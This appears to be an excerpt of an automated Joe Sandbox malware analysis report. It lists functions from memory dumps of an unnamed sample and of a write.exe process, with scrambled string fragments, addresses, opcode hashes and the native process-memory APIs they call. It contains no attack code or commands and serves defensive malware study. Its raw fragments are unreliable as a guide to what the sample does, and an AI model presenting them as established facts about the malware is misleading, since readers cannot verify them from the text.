:YJO, xrefs: 02C3E0D4
4+4., xrefs: 02C3E198
(X.., xrefs: 02C3E17C
*:I{, xrefs: 02C3E183
,**4, xrefs: 02C3E128
:sJr, xrefs: 02C3E0DB
qu3:, xrefs: 02C3E152
5,**, xrefs: 02C3E191
Wu`s, xrefs: 02C3E0A8
+4.:, xrefs: 02C3E12F
:vsq, xrefs: 02C3E0F7
vv{5, xrefs: 02C3E0B2
[jjv, xrefs: 02C3E113
Qsn5, xrefs: 02C3E121
UI:", xrefs: 02C3E0E9
E+E(, xrefs: 02C3E0F0
sut5, xrefs: 02C3E160
Wuxs, xrefs: 02C3E16E
2QRN, xrefs: 02C3E136
"4*:, xrefs: 02C3E167
y:UI, xrefs: 02C3E105
2sJr, xrefs: 02C3E0C6

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: "4*:$(X..$*:I{$+4.:$,**4$/4*:$2QRN$2sJr$4+4.$4+4.$5,**$:B3:$:YJO$:sJr$:vsq$E+E($Qsn5$UI:"$WV6:$Wu`s$Wuxs$[jjv$qu3:$sut5$vv{5$y:UI$|{hs
API String ID: 0-1777624418
Opcode ID: 2c41746a93e60d5674172ebb2213775569d3b079cfc8da617ebb42bd73fd2352
Instruction ID: bc8e89497ad5a41400d44d4c880446afce8c529c48ef0c2e1da40dcf48898bdf
Opcode Fuzzy Hash: 2c41746a93e60d5674172ebb2213775569d3b079cfc8da617ebb42bd73fd2352
Instruction Fuzzy Hash: 8631FBB1C02258DBDB25DFD6A990AECFF35BB14340FA08198D9687F219DB341A42CF58

Function 02C551FC Relevance: 16.4, Strings: 13, Instructions: 194COMMON

Download Yara Rule

Strings

o, xrefs: 02C5528E
F, xrefs: 02C552A3
r, xrefs: 02C55295
s, xrefs: 02C552B1
P, xrefs: 02C55287
., xrefs: 02C5522D
e, xrefs: 02C55264
m, xrefs: 02C5529C
o, xrefs: 02C5526B
x, xrefs: 02C55237
l, xrefs: 02C552AA
i, xrefs: 02C5525D
, xrefs: 02C55256

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: $.$F$P$e$i$l$m$o$o$r$s$x
API String ID: 0-392141074
Opcode ID: b92e994b174df0de8b48431d152169bee4223769f4ed84b035a420763ac09ee4
Instruction ID: fc324fa943c169e55c32fc0b3035555867d07b7beea1b2100d854912815b7b2a
Opcode Fuzzy Hash: b92e994b174df0de8b48431d152169bee4223769f4ed84b035a420763ac09ee4
Instruction Fuzzy Hash: 877131B1C10328AADB65EF94CC84FEEB77DBF08700F508299E519A6140EB715788CFA5

Function 02C551F9 Relevance: 16.4, Strings: 13, Instructions: 176COMMON

Download Yara Rule

Strings

o, xrefs: 02C5528E
F, xrefs: 02C552A3
r, xrefs: 02C55295
s, xrefs: 02C552B1
P, xrefs: 02C55287
., xrefs: 02C5522D
e, xrefs: 02C55264
m, xrefs: 02C5529C
o, xrefs: 02C5526B
x, xrefs: 02C55237
l, xrefs: 02C552AA
i, xrefs: 02C5525D
, xrefs: 02C55256

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: $.$F$P$e$i$l$m$o$o$r$s$x
API String ID: 0-392141074
Opcode ID: 9e4c6fe22cd41d18d6e53116a40d358597431c2912b4d9f1d571ae1fc5c27d33
Instruction ID: eacee1964924439f7744a792865d156c4763f0bdc6b4094ce0ba1c504cc9ef01
Opcode Fuzzy Hash: 9e4c6fe22cd41d18d6e53116a40d358597431c2912b4d9f1d571ae1fc5c27d33
Instruction Fuzzy Hash: 6E6112B1C10328AADB55EF94CC84FEEB7BDBF08700F508299E519A6140EB715788DFA5

Function 02C48E33 Relevance: 13.9, Strings: 11, Instructions: 123COMMON

Download Yara Rule

Strings

D, xrefs: 02C48EC2
x, xrefs: 02C48E70
e, xrefs: 02C48E8C
\, xrefs: 02C48E69
l, xrefs: 02C48E77
e, xrefs: 02C48E93
i, xrefs: 02C48ED7
n, xrefs: 02C48ED0
r, xrefs: 02C48E7E
w, xrefs: 02C48EC9
r, xrefs: 02C48E85

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: D$\$e$e$i$l$n$r$r$w$x
API String ID: 0-685823316
Opcode ID: a4242242b87e7659087b227acddd74b8520a9c1074c9af88a12717afecca0de1
Instruction ID: dee97c57ded95fc72f9da293c43b22cc72747f15718f242b757aab128cda3a7a
Opcode Fuzzy Hash: a4242242b87e7659087b227acddd74b8520a9c1074c9af88a12717afecca0de1
Instruction Fuzzy Hash: CD415EB1D01219ABEF10DF94CC85BFEBBB9EF48704F104159E609BA280DBB55644CBA5

Function 02C41A9C Relevance: 11.3, Strings: 9, Instructions: 43COMMON

Download Yara Rule

Strings

I, xrefs: 02C41AEA
5, xrefs: 02C41ACE
j, xrefs: 02C41AA6
u, xrefs: 02C41AAE
>, xrefs: 02C41AD6
A, xrefs: 02C41AC2
J, xrefs: 02C41AB2
H, xrefs: 02C41ADA
!, xrefs: 02C41AB6

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: !$5$>$A$H$I$J$j$u
API String ID: 0-3285736353
Opcode ID: 4fbb4655230e63d7afc342f796c45ce3cad1e1dadc029582dc4875fe18f75a6c
Instruction ID: f5e23b6c604f6185b0f77c4a744ecbd778ed65144d1a353bd1b1103ad8a322f3
Opcode Fuzzy Hash: 4fbb4655230e63d7afc342f796c45ce3cad1e1dadc029582dc4875fe18f75a6c
Instruction Fuzzy Hash: C411CC60D086CAD9DB12C7AD84086AEBF715B23214F0882D9D5A52B2C2D2B94646C7A6

Function 02C502F8 Relevance: 10.1, Strings: 8, Instructions: 135COMMON

Download Yara Rule

Strings

P, xrefs: 02C503E5
i, xrefs: 02C5040A
m, xrefs: 02C50403
x, xrefs: 02C50335
o, xrefs: 02C503EF
e, xrefs: 02C50411
., xrefs: 02C5032E
r, xrefs: 02C503F9

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: .$P$e$i$m$o$r$x
API String ID: 0-620024284
Opcode ID: e6333827df9c0554250a59a1983199ef33ab8ad79ec72632033329429fbb8310
Instruction ID: 225829c241d9d5b856d4ec9b4838372b148d1d37bc6f6fcb7efc8c9b28bfaf44
Opcode Fuzzy Hash: e6333827df9c0554250a59a1983199ef33ab8ad79ec72632033329429fbb8310
Instruction Fuzzy Hash: 3441C6B28102187AEB20EFA0DC84FEF737DAF14300F408599A50DA7141EAF59788DFA1

Function 02C5D45C Relevance: 8.9, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

e, xrefs: 02C5D4E8
\, xrefs: 02C5D521
S, xrefs: 02C5D4DA
L, xrefs: 02C5D4C5
l, xrefs: 02C5D4D3
c, xrefs: 02C5D4CC
a, xrefs: 02C5D4E1

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: L$S$\$a$c$e$l
API String ID: 0-3322591375
Opcode ID: e409440fc56f420fa82de17adaa79ae64ccd232bc57fee680bc827b186acd3e4
Instruction ID: d2890eb6ac70896f7ce3169d9c4ac924e26d1dc2629cef9236228e5047d3ef70
Opcode Fuzzy Hash: e409440fc56f420fa82de17adaa79ae64ccd232bc57fee680bc827b186acd3e4
Instruction Fuzzy Hash: 584153B2C14318AADF10DFA8DC84BEEB7F9BF48304F55416AD90EA7200E77196858F94

Function 02C546B8 Relevance: 6.5, Strings: 5, Instructions: 203COMMON

Download Yara Rule

Strings

u, xrefs: 02C546F9
i, xrefs: 02C54707
l, xrefs: 02C5470E
, xrefs: 02C546F2
o, xrefs: 02C54700

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: $i$l$o$u
API String ID: 0-2051669658
Opcode ID: 3cb76393a1f71ad3c90e8d6c7cf09ff12f5052196855b8a4d93594513000eb41
Instruction ID: 9e12372a42547e9db321273b1962393cea85ef08b79ad28068c39db754f575d2
Opcode Fuzzy Hash: 3cb76393a1f71ad3c90e8d6c7cf09ff12f5052196855b8a4d93594513000eb41
Instruction Fuzzy Hash: 97714AB1A00354AFCB24DFA4CC84FEFB7B9AF88700F144559E919A7240E735EA85CB64

Function 02C546BC Relevance: 6.4, Strings: 5, Instructions: 126COMMON

Download Yara Rule

Strings

u, xrefs: 02C546F9
i, xrefs: 02C54707
l, xrefs: 02C5470E
, xrefs: 02C546F2
o, xrefs: 02C54700

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: $i$l$o$u
API String ID: 0-2051669658
Opcode ID: a58b69521d8be877476f5940c5e5327835fab2bfdc72224ee2a0f8ce93c41377
Instruction ID: 5b659d90d6cde299b5fcaf4245fe5999b6cbb6743c8322da5a96d099b1cbbdc7
Opcode Fuzzy Hash: a58b69521d8be877476f5940c5e5327835fab2bfdc72224ee2a0f8ce93c41377
Instruction Fuzzy Hash: AE414AB1900358AFCB24DFA4CC84FEFBBF9AF88700F104559E619A7240D775AA85CB64

Function 02C5420A Relevance: 6.4, Strings: 5, Instructions: 123COMMON

Download Yara Rule

Strings

TRUE, xrefs: 02C54309
FALSETRUE, xrefs: 02C5428C, 02C54291
FALS, xrefs: 02C5424D
TRUE, xrefs: 02C54276, 02C54279
FALSETRUE, xrefs: 02C542B4, 02C542B7

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: FALS$FALSETRUE$FALSETRUE$TRUE$TRUE
API String ID: 0-1319493415
Opcode ID: b640ee108b8821bda373fe8bebcd03bb39ee3909b2586c3edaa6a4de189c8396
Instruction ID: 512c9f3560626c8796755c3d2239d50fe4abaa1e42c77afd7b031e08728a9f74
Opcode Fuzzy Hash: b640ee108b8821bda373fe8bebcd03bb39ee3909b2586c3edaa6a4de189c8396
Instruction Fuzzy Hash: 39416E719111187EEB11EF90CC85FFF7B7D9F55750F504008FA04AA281D7745A0ACBAA

Function 02C5420C Relevance: 6.4, Strings: 5, Instructions: 120COMMON

Download Yara Rule

Strings

TRUE, xrefs: 02C54309
FALSETRUE, xrefs: 02C5428C, 02C54291
FALS, xrefs: 02C5424D
TRUE, xrefs: 02C54276, 02C54279
FALSETRUE, xrefs: 02C542B4, 02C542B7

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: FALS$FALSETRUE$FALSETRUE$TRUE$TRUE
API String ID: 0-1319493415
Opcode ID: cc99724e10aa583614db98113381614bf5d1d11a0eb7cabcffdc8979ea249980
Instruction ID: c44dbf88c2801ac27a438ac8bf1d8fd65c4634f40f48c7260aad235452369f56
Opcode Fuzzy Hash: cc99724e10aa583614db98113381614bf5d1d11a0eb7cabcffdc8979ea249980
Instruction Fuzzy Hash: 38318F719112187EEB11EB90CC85FFF7B7D9F55710F504008FA04AA281E7746A0ACBEA

Function 02C5434C Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

o, xrefs: 02C54382
k, xrefs: 02C54389
e, xrefs: 02C54390
, xrefs: 02C5437B

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: 4b4c784845f59c68f2f801429b51c370b1251e90513c8d5bc7a41e5367dd7762
Instruction ID: 431d3023ec96de053fac58599186f5a3319bb55624c4bd06250e1c6fbeecd19d
Opcode Fuzzy Hash: 4b4c784845f59c68f2f801429b51c370b1251e90513c8d5bc7a41e5367dd7762
Instruction Fuzzy Hash: F5B10DB5A00218AFDB28DFA4CC84FEFB7F9AF88704F108558FA1997244D774AB418B54

Function 02C54C84 Relevance: 5.2, Strings: 4, Instructions: 239COMMON

Download Yara Rule

Strings

, xrefs: 02C54D5B
h, xrefs: 02C54D62
o, xrefs: 02C54D69
e, xrefs: 02C54D70

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: $e$h$o
API String ID: 0-3662636641
Opcode ID: 7bef5ed84900c80e2d65be6e3f68789b1ecd72cb614495462338c8e800a4f15b
Instruction ID: dc75b74bdc99d8bcd8184a0e187a68801c5e4897c9aafae50e52b3d72afad0d8
Opcode Fuzzy Hash: 7bef5ed84900c80e2d65be6e3f68789b1ecd72cb614495462338c8e800a4f15b
Instruction Fuzzy Hash: DB8155B29102296ADB24EB94DD85FEF737DEF48300F40419AE50DA6141EB749B88CFA5

Function 02C54C8C Relevance: 5.1, Strings: 4, Instructions: 102COMMON

Download Yara Rule

Strings

, xrefs: 02C54D5B
h, xrefs: 02C54D62
o, xrefs: 02C54D69
e, xrefs: 02C54D70

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: $e$h$o
API String ID: 0-3662636641
Opcode ID: c1920d9259db1f860354f46dc8cbbbfa741ccb5ea53032cbfca2c500d79d0680
Instruction ID: e7a312ba8889c3e3e7bb9f8a70ff4b75286aa0c0e555ee9b1be4ab044720182e
Opcode Fuzzy Hash: c1920d9259db1f860354f46dc8cbbbfa741ccb5ea53032cbfca2c500d79d0680
Instruction Fuzzy Hash: 2F4154B1D10219BADB24EBA4CD45FEF73B9EF48300F40419AA50DB6141EBB46B88CF95

Function 02C504DC Relevance: 5.1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

Strings

m, xrefs: 02C505AF
9, xrefs: 02C505B6
6, xrefs: 02C505A8
U, xrefs: 02C505A1

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: 6$9$U$m
API String ID: 0-3776969392
Opcode ID: 5dddc7d53f06e8a6401dba7c2c81772736fdb295f0c3991eefda5bfe14fcd880
Instruction ID: f1207e524e26296e9bdfcea9905dbd2af6fbd9977d661227465aabb874b89047
Opcode Fuzzy Hash: 5dddc7d53f06e8a6401dba7c2c81772736fdb295f0c3991eefda5bfe14fcd880
Instruction Fuzzy Hash: 1D3144B1E10119BBEB14DFA4DD45BFE77B9EF08304F404199E908A7240E771EA458BE9

Analysis Process: write.exePID: 9096, Parent PID: 4240COMMON

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	94.1%
Signature Coverage:	0%
Total number of Nodes:	34
Total number of Limit Nodes:	3

Executed Functions

Function 04E3F11D Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 550
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 04E3F2E9
NtReadVirtualMemory.NTDLL ref: 04E3F400

Strings

0, xrefs: 04E3F363

Memory Dump Source

Source File: 00000004.00000002.112737038181.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e30000_write.jbxd

Similarity

API ID: InformationMemoryProcessQueryReadVirtual
String ID: 0
API String ID: 1498878907-4108050209
Opcode ID: c10d5b74346486ab4ba49baebec7e09380c2caa305376e3db43f5b31f3f8d71e
Instruction ID: 831eda1f714e9b1551974f95ad47e03a2c102575c61d32dbdb609c0d5fc7f522
Opcode Fuzzy Hash: c10d5b74346486ab4ba49baebec7e09380c2caa305376e3db43f5b31f3f8d71e
Instruction Fuzzy Hash: 89127F70918A8C8FDFA5EF68D898AEE77E0FB98305F00562AD54EC7254DF34A641CB41

Function 04E3F128 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 197
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 04E3F2E9
NtReadVirtualMemory.NTDLL ref: 04E3F400

Strings

0, xrefs: 04E3F1EC

Memory Dump Source

Source File: 00000004.00000002.112737038181.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e30000_write.jbxd

Similarity

API ID: InformationMemoryProcessQueryReadVirtual
String ID: 0
API String ID: 1498878907-4108050209
Opcode ID: 49b9d226476c92254c514a10d0f08207578f2edc8f28ffb2e48dc2fb13f178d9
Instruction ID: 6622c278e3e4a26591778f20b37b03526e3b74b18b22729339a64539553bbf8e
Opcode Fuzzy Hash: 49b9d226476c92254c514a10d0f08207578f2edc8f28ffb2e48dc2fb13f178d9
Instruction Fuzzy Hash: 3C616070918A8C8FEBA5EF68D8986EEB7E0FB98305F40562E854EC7254DF309245CB41

Function 04FA34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FA34EA

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa23d58b65a9048af30f901fa2e052ca8df57e1a47f2408ff9e6126b130b85b0
Instruction ID: 1179aa8a0adbcf8d1757a97543d456373ebe15f0f0476c929b408c7b217453f5
Opcode Fuzzy Hash: aa23d58b65a9048af30f901fa2e052ca8df57e1a47f2408ff9e6126b130b85b0
Instruction Fuzzy Hash: BA90023164510403F50071594614786100987D1285F61C815A0C15568DC7A5D95275E2

Function 04FA4570 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FA457A

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eec56be15745d81b0852b0c8891962fab20e115d1b7e133a39742ee18e6261c1
Instruction ID: b164452a53f2e1a96702f228aa2dfb7311dd0493ba24dea5934b2db2761bf485
Opcode Fuzzy Hash: eec56be15745d81b0852b0c8891962fab20e115d1b7e133a39742ee18e6261c1
Instruction Fuzzy Hash: 2D90026164110043654071594904486600997E2385391C519A0D45560CC628D856A2A9

Function 04FA4260 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FA426A

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ec9b360933b23bdf54841f3908f1c950fac98b294f7d5fd251acc84e95713f2
Instruction ID: dd3e23d0ea1f0fd265676fb7e3f0c28ff348dffb86f897767d5af39e0dcb0142
Opcode Fuzzy Hash: 2ec9b360933b23bdf54841f3908f1c950fac98b294f7d5fd251acc84e95713f2
Instruction Fuzzy Hash: 0A90023164540013B540715949845C6400997E1385B51C415E0C15554CCA24D95763A1

Function 04FA2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FA2CFA

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 010b4bd977dbe97b3af9ca33c611805fb80d0bb4181462d4a64c672a8a88b2c2
Instruction ID: 4fae2a4dfb720d52d6f531c6f368a4d9f73f204d3267ff18655f6c85bbab2efc
Opcode Fuzzy Hash: 010b4bd977dbe97b3af9ca33c611805fb80d0bb4181462d4a64c672a8a88b2c2
Instruction Fuzzy Hash: 25900221282041537945B1594504587400A97E12C5791C416A1C05950CC536E857E661

Function 04FA2C50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 04FA2C5A

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: df4116f0297f451e1de1826a8cdecf6281fb44364d1e4fba875e0d9b72611e88
Instruction ID: bb977e5a90457efdbbe95fb9a42c00652c0da3922c042046b489d1c40b932d9d
Opcode Fuzzy Hash: df4116f0297f451e1de1826a8cdecf6281fb44364d1e4fba875e0d9b72611e88
Instruction Fuzzy Hash: 1190022134100003F540715955186864009D7E2385F51D415E0C05554CD925D8576262

Function 04FA2C30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 04FA2C3A

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1bd362a6b92c87a74af7c1c0d7d2a6a37e33bf9bef56779dcca9d7c7bdd98886
Instruction ID: 9f7fe02d9b1af40a943443ca6acb8abf888f1079b35d069f1301e2f87fa1f8f8
Opcode Fuzzy Hash: 1bd362a6b92c87a74af7c1c0d7d2a6a37e33bf9bef56779dcca9d7c7bdd98886
Instruction Fuzzy Hash: 5A90022925300003F5807159550868A000987D2286F91D819A0806558CC925D86A6361

Function 04FA2DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FA2DAA

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6353b719769d8156ac6d55e08e187e5dd589b5ebd274b4b515f5fe6ef544869a
Instruction ID: 40846556364376bd9d49e278aef07e8ed624cf8b09715957ee900edcc2de7b71
Opcode Fuzzy Hash: 6353b719769d8156ac6d55e08e187e5dd589b5ebd274b4b515f5fe6ef544869a
Instruction Fuzzy Hash: 6C90022164100503F50171594504696000E87D12C5F91C426A1815555ECA35D993B171

Function 04FA2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FA2D1A

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7d209b5004507649caea29ca25386f10cae25ade97a0e881ab57aba0ff6b4145
Instruction ID: 45cb073bd01f221fdaf2b8465a85dddb3e031955b39d9b64a24895a8f4c03a1c
Opcode Fuzzy Hash: 7d209b5004507649caea29ca25386f10cae25ade97a0e881ab57aba0ff6b4145
Instruction Fuzzy Hash: 9790023124100413F51171594604787000D87D12C5F91C816A0C15558DD666D953B161

Function 04FA2ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FA2EDA

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 870765c6bb2964e97e2203803c859213f354ac7c5a2e60682d28575c4055efee
Instruction ID: 6372fb0d082bbaf1494f7054cedc65db2dfcdbec5409ae1bfa527c0328e5f7aa
Opcode Fuzzy Hash: 870765c6bb2964e97e2203803c859213f354ac7c5a2e60682d28575c4055efee
Instruction Fuzzy Hash: D5900221641000436540716989449864009ABE2295751C525A0D89550DC569D86666A5

Function 04FA2E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FA2E5A

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

